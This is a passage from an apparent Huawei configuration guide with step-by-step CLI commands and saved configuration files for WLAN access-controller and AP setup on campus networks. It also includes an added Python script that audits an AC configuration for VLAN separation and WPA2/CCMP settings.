[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure AC system parameters.

# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use the global country code and reset them, continue?[Y/N]:y


# Configure the AC ID and carrier ID.
[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.
[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 5 Manage the AP on the AC.

# Check the AP type ID after obtaining the MAC address of the AP.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
AP offline based on the AP type ID. Assume that the AP type is AP6010DN-AGN, and the
MAC address of the AP is 60de-4476-e360.
[AC-wlan-view] ap id 0 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-0] quit

# Configure an AP region and add the AP to the AP region.
[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 0
[AC-wlan-ap-0] region-id 10 //Add AP to region 10.
[AC-wlan-ap-0] quit

# After powering on the AP, run the display ap all command on the AC to check the AP
running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP   AP             AP              Profile    AP       AP
                                    /Region
ID   Type           MAC             ID         State    Sysname
------------------------------------------------------------------------------
0    AP6010DN-AGN   60de-4476-e360  0/10       normal   ap-0
------------------------------------------------------------------------------
Total number: 1,printed: 1

Step 6 Configure WLAN service parameters.

# Create a WMM profile named wmm.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit

# Create a security profile named security.
[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Set the encryption method to PSK+CCMP.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Set the SSID to test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of service set to 101. By default, the VLAN ID of service set is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the service forwarding mode to tunnel.
[AC-wlan-service-set-test] quit

Step 7 Configure a VAP and deliver VAP parameters to the AP.

# Configure a VAP.
[AC-wlan-view] ap 0 radio 0
[AC-wlan-radio-0/0] radio-profile name radio //Bind the radio template to a radio.
[AC-wlan-radio-0/0] service-set name test //Bind the service set to the radio.
[AC-wlan-radio-0/0] quit

# Commit the configuration.


[AC-wlan-view] commit ap 0
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 8 Verify the configuration.

After the configuration is complete, run the display vap ap 0 radio 0 command. The
command output shows that the VAP has been created.
[AC-wlan-view] display vap ap 0 radio 0
All VAP Information(Total-1):
SS: Service-set BP: Bridge-profile MP: Mesh-profile
----------------------------------------------------------------------
AP ID Radio ID SS ID BP ID MP ID WLAN ID BSSID Type
----------------------------------------------------------------------
0 0 1 - - 1 60DE-4476-E360 service
----------------------------------------------------------------------
Total: 1

When an STA detects the wireless network test and associates with it, the STA is assigned an
IP address. The pre-shared key must be entered to access the wireless network. Run the
display station assoc-info command on the AC. The command output shows that the STA is
associated with the WLAN test.
[AC-wlan-view] display station assoc-info ap 0 radio 0
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
9021-55dc-3e17 0 0 1 test
------------------------------------------------------------------------------
Total stations: 1

----End

Configuration Files
• Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

• Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 101
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#


interface Vlanif101
ip address 192.168.11.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
interface Wlan-Ess1
port trunk allow-pass vlan 101
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 0 type-id 19 mac 60de-4476-e360 sn 210235419610CB002287
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
security-policy wpa2
wpa2 authentication-method psk pass-phrase cipher %@%@}PSoXN{buC{{i+L![@/I<|C"%@%@ encryption-method ccmp
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
radio-profile name radio id 1
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
service-set id 1 wlan 1
#
return

15.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus Networks

Medium- and Large-Scale WLAN Overview

In this document, a wireless local area network (WLAN) uses 2.4 GHz or 5 GHz radio as the
transmission medium. Compared with wired networks, which are expensive, inflexible, fixed in
place, and lack mobility, WLANs are widely used because of their low cost, flexibility,
scalability, and mobility.
Medium and large campus WLANs are deployed in the headquarters of large and medium-sized
enterprises, branches of large enterprises, colleges and universities, and airports.

Configuration Notes
• In this example, the security policy is WPA2-PSK-CCMP. To ensure network security,
choose an appropriate security policy according to your network configurations.
• In tunnel forwarding mode, the management VLAN and service VLAN cannot be the
same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
• If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. If port isolation is not configured, a large number of broadcast packets
will be transmitted in the VLANs, and WLAN users on different APs can communicate
directly at Layer 2.
• Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel
and forwarded to the AC, which then forwards them to the upper-layer network or
to APs. Therefore, service packets and management packets can be forwarded
normally only when the network between the AC and APs is added to the
management VLAN and the network between the AC and the upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated in a CAPWAP
tunnel but are forwarded directly to the upper-layer network or to APs. Therefore,
service packets and management packets can be forwarded normally only when the
network between the AC and APs is added to the management VLAN and the
network between APs and the upper-layer network is added to the service VLAN.
• How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
• No ACK mechanism is provided for multicast packet transmission on air interfaces, and
wireless links are unstable. To ensure stable transmission of multicast packets, they are
usually sent at low rates. If a large number of such multicast packets are sent from the
network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce the impact of a large number of low-rate
multicast packets on the wireless network. Exercise caution when configuring the rate
limit; otherwise, multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles on the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
• The following table lists applicable products and versions.


Table 15-3 Applicable products and versions

Software Version   Product Model   AP Model and Version
V200R005C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
V200R008C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
                                   V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-2, an enterprise's AC connects to the egress gateway Router of the
campus network and connects to APs through a PoE switch. The PoE switch provides power
to APs.

The enterprise requires a WLAN with SSID test so that users can access the enterprise
internal network from anywhere at any time. The Router needs to function as a DHCP server
to assign IP addresses on 10.10.10.0/24 to users and manage users on the AC.


Figure 15-2 WLAN service configuration networking on a medium-scale network

[Figure: Internet - Router (GE2/0/0) - AC (GE1/0/2, VLANIF 102, VLAN 102, 10.23.102.1; GE1/0/1, VLAN 100) - PoE SwitchA (GE0/0/2, VLAN 100; GE0/0/1, VLAN 100) - AP - STAs. Management VLAN: VLAN 100; service VLAN: VLAN 101; AP region ID: 10.]

Data Planning

Table 15-4 Data planning

Item                                    Data                                                      Description
IP address of the AC's source           192.168.10.1/24                                           None
interface
WMM profile                             Name: wmm                                                 None
Radio profile                           Name: radio                                               None
Security profile                        Name: security                                            None
                                        Security and authentication policy: WPA2+PSK
                                        Authentication key: huawei123
                                        Encryption mode: CCMP
Traffic profile                         Name: traffic                                             None
Service set                             Name: test                                                None
                                        SSID: test
                                        WLAN virtual interface: WLAN-ESS 1
                                        Data forwarding mode: tunnel forwarding
DHCP server                             The AC functions as the DHCP server to assign IP          None
                                        addresses to APs, and the router functions as the
                                        DHCP server to assign IP addresses to STAs.
AP gateway and IP address pool range    VLANIF 100: 192.168.10.1/24                               None
                                        192.168.10.2 to 192.168.10.254/24
STA gateway and IP address pool range   VLANIF 101: 10.10.10.1/24                                 None
                                        10.10.10.3 to 10.10.10.254/24

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the AP, AC, and upstream device to implement network interconnection.
2. Configure the AC as a DHCP server to assign an IP address to the AP from an interface
IP address pool, configure the AC as a DHCP relay agent, and configure the Router
connected to the AC to assign IP addresses to STAs.
3. Configure the WLAN service so that users can connect to the Internet through the
WLAN.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2


[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.

# Configure VLAN 101 (service VLAN) and VLANIF 102.
[AC] vlan batch 101 102
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.10.10.1 24
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 10.11.10.2 24
[AC-Vlanif102] quit

# Configure a default route on the AC.
[AC] ip route-static 0.0.0.0 0.0.0.0 10.11.10.1 //Configure a default route destined for Router.

# Add GE1/0/2 that connects the AC to the Router to VLAN 102.
[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC to assign an IP address to the AP and the Router to assign IP addresses to
STAs.
# Configure the AC to assign an IP address to the AP from an interface IP address pool.
[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit

# Configure the AC as the DHCP relay agent and enable user entry detection on the AC.
[AC] interface vlanif 101
[AC-Vlanif101] dhcp select relay //Configure the DHCP relay function.
[AC-Vlanif101] dhcp relay server-ip 10.11.10.1 //Set the DHCP server address for DHCP relay to 10.11.10.1, which resides on Router.
[AC-Vlanif101] quit

# Configure the Router as a DHCP server to allocate IP addresses to STAs.
<Huawei> system-view
[Huawei] sysname Router
[Router] dhcp enable
[Router] ip pool sta //Configure the address pool to assign IP addresses to STAs.
[Router-ip-pool-sta] gateway-list 10.10.10.1
[Router-ip-pool-sta] network 10.10.10.0 mask 24
[Router-ip-pool-sta] quit
[Router] vlan batch 102
[Router] interface vlanif 102
[Router-Vlanif102] ip address 10.11.10.1 24
[Router-Vlanif102] dhcp select global //Configure a global address pool.
[Router-Vlanif102] quit


[Router] interface gigabitethernet 2/0/0
[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 102
[Router-GigabitEthernet2/0/0] quit
[Router] ip route-static 10.10.10.0 24 10.11.10.2 //Configure a route on the Router destined for the network segment 10.10.10.0/24.

Step 4 Configure AC system parameters.

# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.
[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.
[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 5 Manage the AP on the AC.

# Check the AP type ID after obtaining the MAC address of the AP.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
AP offline based on the AP type ID. Assume that the AP type is AP6010DN-AGN, and the
MAC address of the AP is 60de-4476-e360.
[AC-wlan-view] ap id 0 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-0] quit

# Configure an AP region and add the AP to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 0
[AC-wlan-ap-0] region-id 10 //Add AP to region 10.
[AC-wlan-ap-0] quit

# After powering on the AP, run the display ap all command on the AC to check the AP
running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP AP AP Profile AP AP
/Region
ID Type MAC ID State Sysname
------------------------------------------------------------------------------
0 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-0
------------------------------------------------------------------------------
Total number: 1,printed: 1

Step 6 Configure WLAN service parameters.

# Create a WMM profile named wmm.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit

# Create a security profile named security.
[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Set the encryption method to PSK+CCMP.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Set the SSID to test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of service set to 101. By default, the VLAN ID of service set is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the service forwarding mode to tunnel.
[AC-wlan-service-set-test] quit


Step 7 Configure a VAP and deliver VAP parameters to the AP.

# Configure a VAP.
[AC-wlan-view] ap 0 radio 0
[AC-wlan-radio-0/0] radio-profile name radio //Bind the radio template to a radio.
[AC-wlan-radio-0/0] service-set name test //Bind the service set to the radio.
[AC-wlan-radio-0/0] quit

# Commit the configuration.
[AC-wlan-view] commit ap 0
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 8 Verify the configuration.

After the configuration is complete, run the display vap ap 0 radio 0 command. The
command output shows that the VAP has been created.
[AC-wlan-view] display vap ap 0 radio 0
All VAP Information(Total-1):
SS: Service-set BP: Bridge-profile MP: Mesh-profile
----------------------------------------------------------------------
AP ID Radio ID SS ID BP ID MP ID WLAN ID BSSID Type
----------------------------------------------------------------------
0 0 1 - - 1 60DE-4476-E360 service
----------------------------------------------------------------------
Total: 1

When an STA detects the wireless network test and associates with it, the STA is assigned an
IP address. The pre-shared key must be entered to access the wireless network. Run the
display station assoc-info command on the AC. The command output shows that the STA is
associated with the WLAN test.
[AC-wlan-view] display station assoc-info ap 0 radio 0
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
9021-55dc-3e17 0 0 1 test
------------------------------------------------------------------------------
Total stations: 1

----End

Configuration Files
• Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

• Configuration file of the Router


#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
gateway-list 10.10.10.1
network 10.10.10.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.11.10.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 10.10.10.0 255.255.255.0 10.11.10.2
#
return
• Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 102
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.10.10.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.11.10.1
#
interface Vlanif102
ip address 10.11.10.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
interface Wlan-Ess1
port trunk allow-pass vlan 101
#
ip route-static 0.0.0.0 0.0.0.0 10.11.10.1
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 0 type-id 19 mac 60de-4476-e360 sn 210235419610CB002287
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
security-policy wpa2
wpa2 authentication-method psk pass-phrase cipher %@%@}PSoXN{buC{{i+L![@/I<|C"%@%@ encryption-method ccmp
service-set name test id 1


forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
radio-profile name radio id 1
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
service-set id 1 wlan 1
#
return
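The following script checks a saved AC configuration file (the format shown under Configuration Files) against the points made in the Configuration Notes of this section: the management VLAN (the CAPWAP source VLANIF) must differ from the service VLAN, the WLAN-ESS interface must pass the service VLAN as in Step 6, the security profile should be WPA2 with CCMP, and the pre-shared key should be stored as cipher text. It is an added example, not Huawei code; the sample configuration is constructed from the AC configuration file above with a placeholder in place of the encrypted pass-phrase, and the parser assumes the block layout that the saved configuration uses.

```python
"""Added example: audit a saved AC configuration against the Configuration Notes."""
import re

# Constructed sample modelled on the AC configuration file of section 15.3;
# %@%@PLACEHOLDER%@%@ stands in for the AC's encrypted pass-phrase.
SAMPLE_AC_CONFIG = """\
#
sysname AC
#
interface Wlan-Ess1
 port trunk allow-pass vlan 101
#
wlan
 wlan ac source interface vlanif100
 security-profile name security id 1
  security-policy wpa2
  wpa2 authentication-method psk pass-phrase cipher %@%@PLACEHOLDER%@%@ encryption-method ccmp
 service-set name test id 1
  forward-mode tunnel
  wlan-ess 1
  security-profile id 1
  service-vlan 101
#
return
"""


def vlan_set(spec):
    """Expand an allow-pass list such as '100 to 102 105' into a set of VLAN IDs."""
    ids, tokens, i = set(), spec.split(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            ids.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            ids.add(int(tokens[i]))
            i += 1
    return ids


def parse_ac_config(text):
    """Collect the management VLAN, WLAN-ESS VLANs, security profiles and service sets."""
    cfg = {"mgmt_vlan": None, "ess": {}, "sec": {}, "ss": {}}
    block = None  # (kind, id) of the configuration block the current line belongs to
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "#":
            block = None
            continue
        if m := re.match(r"interface wlan-ess\s*(\d+)$", line, re.I):
            block = ("ess", int(m.group(1)))
            cfg["ess"][block[1]] = set()
        elif m := re.match(r"wlan ac source interface vlanif\s*(\d+)$", line, re.I):
            cfg["mgmt_vlan"] = int(m.group(1))  # the CAPWAP source VLANIF is the management VLAN
        elif m := re.match(r"(security-profile|service-set) name (\S+) id (\d+)$", line):
            kind = "sec" if m.group(1) == "security-profile" else "ss"
            block = (kind, int(m.group(3)))
            cfg[kind][block[1]] = {"name": m.group(2)}
        elif re.match(r"interface |(wmm|traffic|radio)-profile name |ap |ap-region ", line, re.I):
            block = None  # other interfaces and WLAN blocks: nothing to audit
        elif block is None:
            continue
        elif block[0] == "ess" and (m := re.match(r"port trunk allow-pass vlan (.+)$", line)):
            cfg["ess"][block[1]] |= vlan_set(m.group(1))
        elif block[0] == "sec":
            sec = cfg["sec"][block[1]]
            if m := re.match(r"security-policy (\S+)$", line):
                sec["policy"] = m.group(1)
            elif m := re.match(r"wpa2? authentication-method (\S+) pass-phrase (\S+) \S+ "
                               r"encryption-method (\S+)$", line):
                sec["auth"], sec["key_form"], sec["cipher"] = m.groups()
        elif block[0] == "ss":
            for key, pat in (("forward", r"forward-mode (\S+)$"), ("ess", r"wlan-ess (\d+)$"),
                             ("sec", r"security-profile id (\d+)$"), ("vlan", r"service-vlan (\d+)$")):
                if m := re.match(pat, line):
                    cfg["ss"][block[1]][key] = m.group(1)
    return cfg


def audit(cfg):
    """Return one finding per violated note; an empty list means the configuration passes."""
    findings = []
    for ss_id, ss in cfg["ss"].items():
        name = ss.get("name", str(ss_id))
        svlan = int(ss.get("vlan", 1))  # the page notes that the default service VLAN is 1
        if svlan == cfg["mgmt_vlan"]:
            findings.append(f"service set {name}: service VLAN {svlan} equals the management VLAN")
        if svlan not in cfg["ess"].get(int(ss.get("ess", 0)), set()):
            findings.append(f"service set {name}: WLAN-ESS {ss.get('ess')} does not allow VLAN {svlan}")
        sec = cfg["sec"].get(int(ss.get("sec", 0)), {})
        if sec.get("policy") != "wpa2" or sec.get("cipher") != "ccmp":
            findings.append(f"service set {name}: security policy is not WPA2 with CCMP "
                            f"({sec.get('policy')}/{sec.get('cipher')})")
        if sec.get("auth") == "psk" and sec.get("key_form") != "cipher":
            findings.append(f"service set {name}: pre-shared key is not stored as cipher text "
                            f"(pass-phrase {sec.get('key_form')})")
    return findings
```

Run `audit(parse_ac_config(text))` on the output of display current-configuration saved to a file; the sample passes with no findings, and changing the service VLAN to 100 or the pass-phrase form to simple produces findings.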

15.4 Example for Configuring Unified Access for Wired and Wireless Users

Overview of Unified Access for Wired and Wireless Users

In real-world situations, both wired and wireless users need to access one network. For
example, the PCs and printers of a company connect to the network in wired mode, and
laptops and mobile phones connect to the network wirelessly. After unified access for wired
and wireless users is configured on a network, the network allows both wired and wireless
users to access it and manages all the users in a unified manner.

Configuration Notes
l In this example, Portal authentication is used. To ensure network security, configure an appropriate security policy according to service requirements.
l In the service data forwarding mode, the management VLAN and service VLAN cannot be the same. If you set the forwarding mode to direct forwarding, you are not advised to configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly connect to APs. If port isolation is not configured, a large number of broadcast packets will be transmitted in the VLANs, and WLAN users on different APs will be able to communicate directly at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel and then forwarded to the AC. The AC then forwards the packets to the upper-layer network or APs. Therefore, service packets and management packets can be forwarded normally only when the network between the AC and APs is added to the management VLAN and the network between the AC and the upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated in a CAPWAP tunnel but are directly forwarded to the upper-layer network or APs. Therefore, service packets and management packets can be forwarded normally only when the network between the AC and APs is added to the management VLAN and the network between the APs and the upper-layer network is added to the service VLAN.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback loopback-number | vlanif vlan-id } command in the system view.

l No ACK mechanism is provided for multicast packet transmission on air interfaces. In addition, wireless links are unstable. To ensure stable transmission of multicast packets, they are usually sent at low rates. If a large number of such multicast packets are sent from the network side, the air interfaces may be congested. You are advised to configure multicast packet suppression to reduce the impact of a large number of low-rate multicast packets on the wireless network. Exercise caution when configuring the rate limit; otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS Configuration.
l The following table lists applicable products and versions.

Table 15-5 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
